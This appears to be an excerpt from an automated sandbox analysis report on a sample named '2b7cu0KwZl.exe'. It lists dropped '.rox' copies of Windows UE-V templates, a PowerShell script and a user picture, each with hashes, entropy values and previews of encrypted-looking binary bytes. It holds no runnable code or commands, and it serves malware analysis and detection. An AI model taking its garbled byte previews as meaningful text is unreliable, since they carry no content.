        Preview:oX4....v;Z.....0.{..@.....1...q$...h_8..X.@OY6h.....[..q[....M.}W3.)=..-p..>v.m.`.m...M-......O.k.g...W..Q:BJ^.I~.G..n..?C..)....l....t.?;Y....f.,.%.#.8....LX......v..n@.#(..G/..Y.:..B.t..2l@.bCt,...|.DWz..D..h...Y~.......'y......"..\_.~_=.UY..6|..n......u.....]u.;...1MQv.....3.C}...k>...EyX.........5|...9.1...g..(n.`/.J.s8.&.X..E..\...;(<.[T.xE....1\.+.S.[....6..u...#k.......@.../..P...^..W............*N..]P.|..5..p...j.97.r...4.U..........t.....#'w..[.).=.W...m~..2.j.{.....^.w..u.?4.....M?.yqZ..'...."`..ww.V?S..H.5.$.........w..Y..;u.{.;..M1.]..k...I{>.xu"1..8..i......ni....,.....=`.6...\G.......vX+l....?/..-.....r..P,@.{..Z.|..MP.m...x..@.r.#..&.L.Y...Lru........t..4..U.^.....8.\X"..._*n$..Flk...}..}K...o.5.H7..t.67b..q..D..|...=.....'..eG&.}<.V..!f..i.....5.'fv......RJ....HI.>.6WO.X.a..r.7T.......1..^........&e....9....I....J?. .:j..........P.j..}...x1cc9.h....5.~...k.@i|`PU'H.8..a._j.`.".......tx.....e0.......w..QC.2or....*.G.E.+.(B({q..v..do

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1425
        Entropy (8bit):7.83346786320411
        Encrypted:false
        SSDEEP:24:NEoajbBFLu0bNWlt2tAr7wYrVTXj1bzMx8dQazoYYnX0mpf/YJ7AWA:KbLI2t2ccTBPa8dQazHYX0Y/YJ7Ah
        MD5:B84E246D5B507D73632DAB09B2F62BD6
        SHA1:AAAD0D9ADF4710042C5067A9FA614BF051E4E32E
        SHA-256:3F6A2372A1135BC6913AEA70EEC9473B17CF62906DF679C4D1DC00E4CDE04178
        SHA-512:4B6469FDAF35E308A882389F44179E5F54E1E1C7A50E666C2A17FFB4384CE8742F4A59F92B561810964502C15CEB425043DEF4C432B279B23EE163E2C6977652
        Malicious:false
        Reputation:low
        Preview::F..h)....+.........s.......J.Cv.RfE.z.ZDV...UD...........Z....T..d.0....r>.#|...3..N.'`.C....6!...0g0#../.\........6.....N......0..Y.:.&...G.J...0.C.D..4e..A.N.$.Me..O..G.C...WKk........pT.#W...-K..s....F!.&.H.7..._E~.E.Q..).vW.O...W.Q.b. -KE..-h~X..@....M..X0....P3m.nW..........:...v.O..;.~}|..d........4..aD....Y.Z.T.e...w..d.u[.%\......V..C1[X..T.Q......kM...)..{.g.........[..,.:t...w...G..Lz.8#.,..R.6I..l..a..O...]...._..wd.#:,P...D.d..`.#Y...Mu.ZL.bm.Q."M.1..'..].5H..kQ.#8..tI.y. .....`.aV.\....1.....G....A8.I..R..aH6|6%P*..o.19_.x.7..l...u&A.2g.~.T.....x...\....f...._d.49. ....t.....Y.S..n.......}.v.a^.?.M{+..>..z......<\.G.s!....,9...~/.5j....D<....*./...q..*.....G.A..G..D.s...Ql.h4....c..$;Wb...q"...831#zrN.1.5FH>...-...k<;.P.AX40.{?U..8..y..B..(+3.T......q..l..o.....:.,_wX:..>....q.....W......E..Y.9...Q........Y..s.*.o..WU.g.@.....1.~1i*........!..5.Q`...#.ya.g>...g....+.|.u~}a/.U:.#.u..pP...\.G...C...tD;.oC.r*{.).z......(......J...o

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1425
        Entropy (8bit):7.8438571774521995
        Encrypted:false
        SSDEEP:24:sbeox1MYqvA20zSlAn7II22u9XMZh9dzDGoVCFuYlKEEj40aW0YaMmM4ktOm6LKX:sbNxeovzuAng2uGZhBVuz50/0/u4kt5j
        MD5:3754B734BB4ED8246AF0F27026CD1CB5
        SHA1:486364A2418B14B6D8A5EC6E84845A694A54515B
        SHA-256:9F2374CE6841ED489576158921F3A73CD8F2D7D1AA80BF031B19D8C49579B211
        SHA-512:D492EB319D8D34F7ACFD6850087BEF7E3B6FDD5195EB16474E521393EFB02C7A4DADA6BFD2A9F9F9816FBFE2B2E86F78639CBAB65F1148D163B30061E330DF91
        Malicious:false
        Reputation:low
        Preview:.,...7z.,+.y....v9G.ya.8^Q9G.#..2..X<...6.5{....<.....z'.'.a.T>2...k..;..x....M.n=.........e..T.`w..9.W~.4..e~.\_...W...dp+...K.9..fn..n$.G..........h...L.8...G..l.vr.%c.3.7.yJ.B.t.}<....ej.L..thY.m....W....../..k..H..D..o..f...hv..-..+....s....<.~.%..e...$.l<y..&\. ..[....f.H.s\}...o../...L.D......*.....=..!s@.`.e4...."..Ts..`.5"..o.".Wc.W..k$.-a.b..6...0..z.q....w..#.........W.......2.........@^..m.V...{J...q..W..w..........%R..: Z..H.9.......^T...ADd.HE..1...F.A..b...E0H.4...z..ze.V..hT..........;F..0J.n.y.z....H.2..z...TzV|_:..$...w....].......Q...H.)....pn.<..z.CHm..Z.\.....e....*5..8.."..._...4\.@nu...z.:,8......NJ".>...6DK.3E..B.A..O......7f....:o..+s'.-.......Q...{9G.......Mg.Z.[,..(q<q>.|.*.+.[.:...wi.....l2..:!LQx..U....0.eK.1.zj.....T.u........F.(*..ijM.Y).aZ......?]p.F,76}..,...W........g7i....]Vx.W}..}IHH......;.j.l.<..~........'%6...QS.n...jK.#)...Yx.k+.6.9......(,+...1uE.....3...|h....]..J...I.yh=.....p.)..#g..$..j

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):3027
        Entropy (8bit):7.925374553536413
        Encrypted:false
        SSDEEP:48:9SfBb5+v10h7iJZZUqruGXLaeD48XpdIzOOpk5SBPZBQKKjKob9SYcUOdRX/8Z0v:2Fnh7OjUqruG7BEopdV95KPZBQK7A9SV
        MD5:EF227E252B83C6DF8ED82ECF56EDAE7B
        SHA1:7AFFAF1E4C65EDC14285DB48DEC16E5723A4F443
        SHA-256:9A9C95F8D59EA5FCA25117D7226D20236F0B31ABA03535C1ABE835E5F9D6F04B
        SHA-512:B4D5C32CB28C6446C972DF666611BC95B6793EF42F81BCF0B5A50EB7D543FE183A5E5E3CC252E339F3809D8A464736D241F31C62C4A142564AA48EC854F513A1
        Malicious:false
        Reputation:low
        Preview:. . w?.....D!..Bq.../>...2X.J..U....R.?....c`......t..0-gOO?.]Q)....>..#.n..un._.Ez..b...I..(..o....."n=.7L.M.ww.........@....I...M....+...*...9...WKK... /....w..7.o....;s...z.....N...)...d[..[....E...n...#".-.....^....L..5+Zcr;..2......E....n.K..%.$@:.....p...G=..0....B..Q...t..h..xD..C(.p..N..Xe$rz..b..w.mL.(b8.......l..Uu...F..zK....]$..&...u.*......(....'...uG.{../v..1.:.C.....{..x.P....,>.Gw5C..L4%w%t........L-...D*....0.JN....2..w........2....>c......F....^YMG...-.\..$(0.|.Y..H'.-3&...g....3m.8h..D.J: ...2.iq..[....t|,D......N..b. ....'0i:..W-.3.F.....R.....<.Cz.{..w............z..(2...axZTVz..#.?..}.2..r.h%./e`0.<....6T..." ...j.V.-.07W.0.|..Y..Y..}m...Z.I..uZ\.BM.^...X<=..H.........rt...Hq...U.V..s..,....I.. .....d..}...V..v../.wKM...9/K%Y.LD.b.r.'lBT*....9.$..h<.L...6....z..>.y..w.@.`.[[.%..Ij...._^P.j....H.v....1.ib....P.b.4.}t!./&.8...5~`..a..o.".....9..Z..H...s,pT.....G1..N.D2....A.!}..sy....Eb....5....0-.....;...r.~<..E...7 .e..

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):3027
        Entropy (8bit):7.921860964255573
        Encrypted:false
        SSDEEP:48:6hWOpZP9k6Dip61x0rzftTuxA+TQNiuCi/Afi/bYc9OtDORGGh4mj9KlPH2pvArh:p8Fk6Dip61x0rzlTuS+TV/8Af0bYUOcC
        MD5:0868777598573D3878D2ED5B021FC71E
        SHA1:97842B5852AC99D3B01D885DA21E2496DD43F62A
        SHA-256:BD89F693772D4D7259B2902C02641A677C2E060CD2FF1FB9C1380CC20CF8275D
        SHA-512:238BB1E5B7627CB673EC8784515548CEF7A61C4BF72F17C9DC714BD703A35F0CFE01FC1D0CF374CB545016EABEA1AA5CB35F52E418C3F64628911D60608B15BE
        Malicious:false
        Reputation:low
        Preview:.......S..[.D....W..5{e.)....p#....~.k..d.c.=....j..Q..>.......H)..... ....b..n..%s.D. .....R..xPdw...8..w5......q.SF.B.R>.....xJ..K...O.m..h..2=.S.`.S.G ..B..te......j"f........h.....6.k...C|.2.#.Qz:.Ri.I%2!...o9......g...."..K.0...X.$.M..Z1...:......4.B..G1k..M.}...J>N!nSv)[....B...c{.+.m..Eg..Cz..vb9.. ...J.i........@.E.....t..=.......K[.[.X...k.\..,.....JH"x.`..:T..m..qO:.f...lK}..3...O9.D%r..$...NC]=o..c...[x...Z{ ,...9.siH.eY........>2.......khZJ...g...v...2.%l=.u....,...B[8..a..x..Zk{.ZSB0....K..O{..V'y.7..jr.H..NY....3....W.P..mb.u....+>.P.........(.SN.<).X.,.........8..8p.h.H...w...F..t.^}...o.;..R....p.6J...^.V.WT.X.W..../... t...F.(a}d^.U..R...\..".U.......|K..sN..K.]n....R"....'.7yt~K.;.'......iB. #7..$.u!.e..#.M.3..S6.`S....E.......ea;.:6.!.(}3......`.<p!.P.Ny..[W.Z..p..r.p..&...........^...L....SO....*.P.C{O...t..X.S....P{)d..<..f....x........!.e.m.b]...V'6.G..H...."|K."S...A..?9B..jF....:...M!.E.n%......?...q&.e"..%.~

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1141
        Entropy (8bit):7.78508248388313
        Encrypted:false
        SSDEEP:24:ZxZlLJ3nmfbxIiPz8xwLB3BQWrbDFWu1KMT40F9YK9ASyO/HcE4Y40HWA:7zCjPgxs5bDg/M5zYsyO/8E4Oh
        MD5:0A7A1526815AB09D0AA5B79F6A7727FE
        SHA1:F9ED24D4247EEFFDF187B8E3160EBDC420547B18
        SHA-256:01ABD9C8E02009B2E70A71F0C971595D6D5918221AA6CB16EC7F9C477A63B8AD
        SHA-512:7B72B4D221B10D920DC459FAAAF2FD650653FE3DE721B76427F73896B16F5ACDEAC0660D8E1C28BC83D857C601A5C11743CD140742F002897B7D41B2A144E1F4
        Malicious:false
        Preview:.z'...0..Z_..zCV......3.5.......2.F'.6.(.....Q..9.%...`..3.Bv...4x.G._....i.u..j....^........[o'.O....JN.... ..\C......O....g'|.Q..Iw<.;.H.s.18.Q;...fVu.N..>.O!..}.q.i....B.3..{.%my.vM}*R.#.t.ZML.......9....>q....h.+g....."CT..qw.$Q2G.W....ZY...'"P...^.5..B...v05....l..J..f....q7[.=...27q..."`X9...f .*.mF.. o..2.w...W:..4..i/...N..Cr7tx........u.......t>.......n8\.n.@t.;.;...<\..G...;\.9+0....I..J.9....cV.s.-.........R..kb.........[.j..8.._.....P...]....D.p..5M...~.*...........yr!.../]..-....c..y.+.an.T.....>..g...yi..E..W..<:Z.8.a!E....{....!......D&....Acb. ...........i.I#..f.e!&w...b..?`.#.Aw...,...7.MA#....Ce...+...^0..7.U.5."m..#?.....cDh.^..zLb..A9...G.U....,....X..x...90H~.....$....X..9C9.T.vL...Z..B....@.]..0:...O.;...b4.i...<2!.;1?."#.......01...a.[.p.S.._.[.+_i.B.S......:.6.O..w....}%.[`...3.HJ......V..hw9..#.|k4%'........2.hs7..%..`..|...z.x.w~T. ~.Ee#>..@...SX..`...E[......U...u..7~...Z.Xf.h.Yq././..e\.t!...znxH....=sx@....

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):2279
        Entropy (8bit):7.885895949044385
        Encrypted:false
        SSDEEP:48:CBkiUqkQUu2LYo4CDvPhVQsg3mHqha7Xt2SjjrH8c3+xh9Ch:CBk6Uu2nvPj5HOmt2q3chM
        MD5:8CCDBBA80B6082336F902D7E7C7B5918
        SHA1:F5938281A5DAFC7C3D9DF72C22FC782EA5066E1F
        SHA-256:EA158ED5C82B47334159B772E5AD814AE2D0ECAD75E0F6456CC160DCED3DDBB5
        SHA-512:D2A6E3B0DD01DBB2E82F0F8BA9E823731ECFAD1D74CFE1687008E5EFC6645D627873171B1E703ED3BD223C63C1203267A01F440AD1144F35BE0DB0847B66231C
        Malicious:false
        Preview:..k..vn=Z(..?...X.x...1Sl....<.H....R...a\;!O..Pn.>.H.(<..w..b........2Z./...C..(.8....8g.i+ .....d.)J.R.;..,..N...A.....i-I...@g.Y.....Z.....yH.Hf'.."..W...7\.E..j.f...C....J.CF.J....k.N..Z....0..f......=.>..l.....#......0...._R....Vi.#$....5..T,..#..f..T.~.TG.Y....Z*.&...ax.b...B.................]%.s.)r..u..]...T..............a..|>t}. ...6........a.y...H..i........DB....i.#I..yF...).....I.4\..k..2y.d&..?....#].!........`a./..]9Q...#...._..dR..e.%.!...H..X.e.r....$.a..K&...X...]..{.;*..t..Z.M..U.....t. 9.....O.dl..|>z....u.-r.Is.......6..R.+..jk.....Tm.h..CZ..o..&....85....{H.......;C.R.;@..qU......' X.7...A.f%...l..Uc..B.rt.)......M.1.@...9!.........CJ........K/r.e.......5...A....a..6x.6I.D,B.....).-.9_,*)YB..t..H.;.....E..m.......5...l...,...r%.....,..c....P.D....X..B.4s...#..p.^U...`..z...).*'C)....y......s....XV..r4.T.fM.cC]U..]..2..Y:.U..A#CN..9..}...dm.>.Pt8.jv3XJ4y...9...M..2.0M...J!{1V..P..L.[...XyN.pIT'~...|/........YP..}..

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):3553
        Entropy (8bit):7.929355689192362
        Encrypted:false
        SSDEEP:96:xqM9FTkTFjUEtobDW9P/XC5+/EYJTK5xROHjP3P4:xqNvoX4Hg+/XlaxROc
        MD5:5274B07D1274F505B787D9F3EAA4A84D
        SHA1:FF918E0B62984ADAB2C40123649612BBAFDA82E0
        SHA-256:22B4EC2AF626DD4E0D981B0CA9467D4DD2A1289295B84301C1E0B6603B522E6B
        SHA-512:458097C733E951B69E5E7810A8741A5018DC6678D2FAAEEED476A16E4C7FBCE108EC15556FA765F1F389C38574666874CAC395CF05297B2A694BE692D69F3D20
        Malicious:false
        Preview:...sAL.. ..M.Y..;.q...{.h..).@....2-...(....Q=.W*...w.x...p../.Z.hp9....<.C.....U..".bS.y.2.MA!.~..eZ......b?L......Ht.PF}.'G..?:ud..j...).l.... {K....A........?..0..p...A.......Y.<+>.......RF.p&d.......0..K..zE..Ya....Q..i....~...X..V......k...b...X...(R.....].......0..f+S.aO...05.......M..F-..h|.U...!L.z.L.4+..9.s....h,.l.%;&)b........a....n.h.A=.9G.X.,.3...[..o.+&...9Y9.@........v+.nY<p...l......?.5.....J.._.....BZ.%..y..WO.5.q.l...Y..a..q.=..h>..m>C.*.-$....j=E.$....a...../Np..$m........PT......kx.lf}..U....qtB.Y..O.c......~K.[n....Fk.....J.v].i....QIE.|...t.R8......[.....0.o^.6{6}...f.E...5.W@Y.P...H.{...Aj.."..{.Y.:..F...0.i....1d@.......@.....i.&....#*...r......F......p...=..v...M}.|.<.R6h..y19......u.O..b..t.T......Y..k.....q~..........y...Z(.#........H./%!.hb..3{/L;9:.R.#..'..5.N#W<.Iq.O.W:R.x....8.....~.<5]u...V..)s..B.4.s....y....;.#.re..~DM=.<'.D5y.Y......?..C\.8..kR+66&.&..)..c..3.f...b..2M&H..<....M^'....L.|.....(..

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):2742
        Entropy (8bit):7.912868272953527
        Encrypted:false
        SSDEEP:48:Qc3zaKLhGa4Ed0YJIuvnyUUDSNkBJb7l7vVCPS6tSfQ7ic/vbErx20Y89XOvAVh:N2KFkEddJzvnCDAQX6S6sQ73/grb/9W8
        MD5:C0C6359574363685051C95709DAC170A
        SHA1:4ECEF130814C53714EC7AB5915D7063B4947E633
        SHA-256:72879880B94096F573AB857B940101C95D8EDAA8860C9BB04B4E04D4B26541F0
        SHA-512:A29B5B0BB39731C5301BD85D22C900AA132AB701167507C18120275EC4D52BB18458205B487422827075A792C4BA5DCE8DCA6C4CBBB81F2D206D00DFEDF2D3FA
        Malicious:false
        Preview:...'Ld..U`yB,z...*#.3@...V.hF..@.....B.Lc.E%..YH...2...X.......$......`c.]...(.a..4...c.@..6=....['<3._.........*....K.x.oy.d.1..d#..GI...K..oz..<q......I[.^.$s.1."Q2].......p...#D....T.Nm...{8G\5....+...m$.8.{5.V...;\B.@~...O..~.u..6Q........i..j..v.:^......e.....2J...Oa..%z.X...7=.k....s....+..)...%d./..T.*U..-.\..._..N..ZH.@.q...\.....QJl.....V.Y...x..TA9.....j..l(..{..`x:y..*[.....K.K.w}:..Y6....l.5..4.v.V.X.4%.~.....T.4>W.Dw....>E.....C.X?}.g_.2D!lAe.L.....gF....73&...]..f.B..8."..O..n3.?...f{....`....b..y)f.=...v(N..0..V..i4~JbAq..2.E=........>.+T...9N<U.h.\....l..h.Z&+.......T).>.Hh.?2M.....N.y..1f.:.......T^..f.....@..t..fh.\..mA.R<....{..:.>..Q.....ow+...A(...L......L3;$.O......\a.t..2.&.|l..N..J.zcy.}..A....L....u4......$.j.>...K.o.....',.4..]..X...d6..a.......e1|n.Fz....P.... ..P.<.9...............t...n&..)....oFj..G...............&.}..+.8...7.W.ir...Xh.Y..tl.#.......,...|.<.-..cy.1;\.9..I.X.....y.)u...l.ux.~v.].5:.....D/M27

        C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):1028
        Entropy (8bit):7.770812298182169
        Encrypted:false
        SSDEEP:24:ub8KUBRWm7N7iP9dvn9aPBMGquCVnoCI70Kfd0jWA:ubPUPW2iP3vgoRSoK6jh
        MD5:C502BA792577D51370A9CFB9921314A2
        SHA1:97EA636DD3026D17A51FC589BD346D16D3D3F438
        SHA-256:CCC769AB26E2057068C08AD1A38424919490427F668CD25CD2F20D22F764DAD2
        SHA-512:28FA3FB1CCE5F1ABB4EC101133B035FFBE1DE9645E6D03935358E9A0A966177B60532663A6D482BC4FA1DD15345052ABE75109754876A8211425A56B2B267486
        Malicious:false
        Preview:..<...:.]).b...q.![{.y...#.......|.U.2.."....'...'..XND ..m_..tl....>d.8eg.I..........-v8.L...u..T..$.(h...].o../.=..:..:<..z...U6...3!..O.....}..,...Gm..,e.u...;.......Q.f....%......<..)......).M....t?...<.[+..~i...PV(...e.'.30*..#....@g/....kk.=....Ige.Q:llmmy)N&..g...LHn.../.......)..)..^./..j.('.4. Z..G&.2Z.\QM.@..s.=..Em.....\.....x....s..........6..b.T.z_.3GH....X...9.g.E........b.B..C./...n...z..o....K.&}.;V.p....L.....[.c"......w./..-:.....8....>;..F0`.*..j+..D.k..R...V.w......MJ........2..1..#B.*.b..O.d.91...B@jL4..|?.k....x]..3.....$.l.5;~o;....vf~..+|.f.........n6l.h...X`.[..].a..p.0+.....dWm/J....K9.k.1...../. ....:...<.3tgT.:........Q....?<%0Sd.*.%...-...@.me..?.9!...D..4H..c]WR..x'.6A..v.q*.*o......q.jFRAr .[..G..<E..(...W;...+..w..+..y..B.".b#...jz..V.%..}.}..d..K.M.m....U..8.<.SV..c2-.....(.(.4y.S...B-.<..~.-.........!2A........(...................|........?).>K\.q..%:.~....\#........S..T.....#.WO....'..69....7...m.J.i

        C:\Documents and Settings\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):747
        Entropy (8bit):7.62247146359413
        Encrypted:false
        SSDEEP:12:j2vxqGr7OMFttS09vwBBIgRhPABwlC3YEEYotqPIWB2WOp7ONtlW9sIFN53X5dJG:jVy7OMFWLRhYBwlCjElqg1WOwNtlW990
        MD5:D12593C0382F705E2D444AD61DD4FC9A
        SHA1:E28F3E8394795C56B23AF617E7442AA887F3FAF2
        SHA-256:ED87269FF627A327EF5FD573996FB26A828E7CA4EBB52311142DB2BE402531E6
        SHA-512:FCE52CC7E872F071AD263917B915399045A9A8DEE67D8C80D0372A647EFAC3532FFF2A6A2DAC1ACA9A61CC1F2F1DFCD4C13CBA090A8771D081EB39A518C55EBF
        Malicious:false
        Preview:d..'..=.i.=..(+R......Y....8.Pk.....4...._...8^.........i.#'/....M+.~.....'.K'....1C3,.t).mT .....Y.......0)5>.......Q..g..;.44{.S.:..xga.-..|..LU..&.U.<.|L.^...>.&|b.8...Z...3.,...Tt.o.Y..)...[]^.h...y......E....f....^6(...d..o.QV......[r.#..&H..2Hn....fQ.KJ.Ar.T|.....#..`......&...j.mH"!..dW+...B..g..f.N..V.1.Z.....'..O.fO0.9G..%...M..|Q;....N....,..e.....sy.;..L..f....|.d?*...{!...m..x#&.=...e[cD..4...g.q_.:.8{.L.</.....O....G.:.;.......t.[p.n?.$.6-Y....]....bBL...Y.e.o.;28.D4*u.2..h.*.....1q...?N.L..U.X.{{...C.J.?..m..7..3og.o....&...`....}.'g.C..m..<.................0../E..!2A........(...................c........[..+Z.#.....%....C.TT......n...S4.U..Q.v..k.W-..s..R.(...m.J.iJ..5.C.....j.b.p...5uD3$.

        C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:OpenPGP Secret Key
        Category:dropped
        Size (bytes):9844
        Entropy (8bit):7.982161335851016
        Encrypted:false
        SSDEEP:192:75u/Ix8CyB4II3fquayw5WjWTdCc1wtGA9I7E0AT9:7k/IxZX3iuLwY2db/8
        MD5:099E7B4CBAAB5248863CC59F8F0AE78A
        SHA1:9778D1D2015E5775CAD5D2E182ABD6DF9B8B2AF1
        SHA-256:399466B018B22F9551F905CF5C1EF3C2EE9FB6A50F39DBE7F588307055AB02CA
        SHA-512:E0A41B5EAD26D1791583F37C091838903207A2399B55B1CD9E38788444AD74AA2707B9F4BCFDFAF608F694AF57EC7DD3EB15F1F80232FBD5F5D810C7160F8B1C
        Malicious:false
        Preview:....A..u..b.....T.,9'..:4^...R.x.S..c'.!...[..F..B.L..gf....(p.E......S.W.cv.w2y.f0U7.h...w.84.$......b.r.Y.~....0......_ d..2..6db...LD....qJ.<...~..Z..._.n..S.X.-.$.j/.H.o;.i..C73.h.....!....J...t.......x...".*v%.3..w.S.?~.dM..].*mrD..3....\M.F.^..N..?...T?.X...R.._....M. .)../.k...r..$..b]CEbt.F?.t...e.\...T.`~..~...$)k.7.0s.|.......c[..H....OK..S.....h.[..o......"I0.Q.R......!...a....u,;.;.O.#..@b.1.j..u.|..7.SN...7...h3...|I.Y..:Q$...knI...$.H~.[M.y.~...K...e..Q..T..........3Y..J.i".+..x8F~k3......Y....cA\F.E..K!3s+.>.....:.m.>...`Y.......w..:........Q...;.0`....U.!.......]..H"..;.EB..../'..y.5....+.jk.:...z..%c.....a....k.J..e.N..W.U..j (.&.A...\.4.cb:....q.....Q.F......v.LB....Y~.IV....>`...a.=WG5%M4.)t... e.U..o}..rXZ.....m...r....td..q...i...pp..b......O;......Q...$.I...,x..)!/@D.d......t.+.7a.S.2#?..^.d..d..*.j...x..<.... ......U2..%.D~>H....1.ra:.b/Ds..|.H56...o. B...7.zQ.7.E..Tq.(..G....X.a.......L^.*B>.:{t.q..[.......\]b.

        C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):11432
        Entropy (8bit):7.9814582609724205
        Encrypted:false
        SSDEEP:192:N7hgrFpAh7b/6XYljedRVnud8PLN8DZKXXL17vJ80i+Z9IADUiVNZ3VUJ:lhg7O7bAYljolgOaDU5xPiKIs9VNtV6
        MD5:3BFE4CC85B5DDCEB530C3A668C6175B9
        SHA1:8C91567DC78626566A5BFB4168F2C3B72E7E275E
        SHA-256:5C3C619A0D80CF2884CAD2449711AD52796B6B378BFF53DF789F77F2ABE72205
        SHA-512:60DF3E03364AB05008BBE3C69CB574ECFB30C117A5B67AFEEE2DA5E5BAFE4649FE2B9AABD103CB9B309D938A84641C945391C8BC2FDAC770E59EED0A68BBB6E2
        Malicious:false
        Preview:..g.......#vLp{,....N..lE.....d..9.e...[?..v=.II.L.s%.j..J.t....,dLQ...}...s.(.].){..7.....I.g.&.`..%O.K...%.S.......;..Do..A.z...U$.#Jq..D....).BXeB<.......D.M..h....'.p.5...._.......h.E"E.d...KnEV...{........W..}]C.d.Z.._....R..^.Y..QQ2Uf..hv.....u.......0...|..}....6....C7.w...(E.-f..@+...E.aj.A...?w..n.x...0..{...8U../.T..4/...|u..........XgS..T....Zb..Py..o.?..,....A+R?..{..V.a.#T..Q.f^C7.`.5/..Q...n....69..I'.Q..B...X.b...4...oB..Z.Y43..H....VS.C....4.pzC..Nm.'{.M.cfhgt.t..+....,.E7...?.vp&..nJ^....,.@.]S..o...I.|.yl..h...F.0..X..B.....5...'.........M#....-.W.H.6R.Y.4.9..QFl.cY{......Yq.....G.._PC.|P.-..E..~K8~I?..R.....~l)~..R2.G..@_;'.'......**.u.=iScPi..M._.#.8f}M.6...m..?0S..M..[Z...E....1F......9L..4.....#.g.M..........N..{.8..Km.....m.B..k..u.q.#...&.D.v.4..XcyL....*...\R!.@....K....n':3...|q..u....^"..-.H.P..`.Y.6%....6ge..=0.u......n(. .A.9Q.F..cU.j ..N.K..Y$m$o...D..|Z/../.. .".qz+.....n...}.h).&....L. ....._Q#rm.(.eM}.8jD.6...u...

        C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):14252
        Entropy (8bit):7.985062601704088
        Encrypted:false
        SSDEEP:192:QxbUPtgN1qE6Oyvn1jnwbj4VkdhaR5enqQPrEy+GKlolFoTfu4ePBkGn8dYW3LSN:QIAb6OunhwbIJzAotG/lH4EBkG8dT/+
        MD5:39EA8706E1CC32D691AA0D543E276943
        SHA1:EF1075C5E239123F14297D8CBC5B5179670CA416
        SHA-256:86DCA2F73EBB4B58951E2E4A5EC24FD3613BB71E297BE8B31BB32BC93697A121
        SHA-512:8631BF96BFAA60A0283A495313A02FEEA19875EC5B0761219A00E7A5F688EA4E3136705E24050717C222C1605150545F7FC1D841C7E4AA113C4A6CD5ED7FC99E
        Malicious:false
        Preview:.... ....a!..V.0].V.._.....o".X.y.O..m1..,.`K....o<..z..Ll..1.......L.4.S.9.m...2.h..........9'..Z.K....G..1.c(..|;o..... *Z.3...f?......F...gT..Hsdm....g..m....<x..<..w.....o.c......K...$.I..+.;<..Mz6..v.%dmG.;.....l......9...:.N;B...g...a>.&..t:..%...mC\Tv.P&q.}6.F...GOL5(.....IIA........e"....M^......M.#....|....?..X.....^:......!.x.....k..Z!.HY,......s.6..y..=.....-...7...V.u....Q/....1...^.j..[}...X..M]...\M..a..M.l7T...|N.........Dm1...,......'.{...@..}...E.&T..}.Y.R?...:.s...k..F/.m..........e..E...D....<.R..K......P=4...1H..Z.x.HEe.A.....5.$&.]..&.?{K....AF.zW./.. ;....U).%<....q...D.(..M.).qb.>.}....F.`.S.e...K..T\RX.SF.a...2.>e.L&F..#..../.z..J.....ja..7.B.]t..>.[....|.S.*..{....>.v.{....g:E0.....pM.T~.i7U=.?.,6D......p.s-..m..'..-..Y.Lc...._U~g.(.{[.. .5.?.E/xH...d...B.....k^..(....<..Oo...<.NC...!S5-z.,.a.oy....f.d..(.........1..g#.......i..G..\5]..5...Z&..P..a..=....*...V\a..F.1..2.....%j....%...Y..>N.X Y..;U...........#.n...6h.c.

        C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):602304
        Entropy (8bit):7.999714024500647
        Encrypted:true
        SSDEEP:12288:QGU1mOFECkgDbfsaaX4aMGl6LXov1spfIaTGbIc2mf1:QGUgOFECkgVtaMGleQspg1bIc2W
        MD5:5C668D453511A8C45AA2311EEA6543F1
        SHA1:A4E0280177CA055B7F576789E29EF31BF2A4579D
        SHA-256:8F0E6C72F950E8C57B3940BEE538AAFD3348B2C0D0CC75EB0BF69BAD049089DA
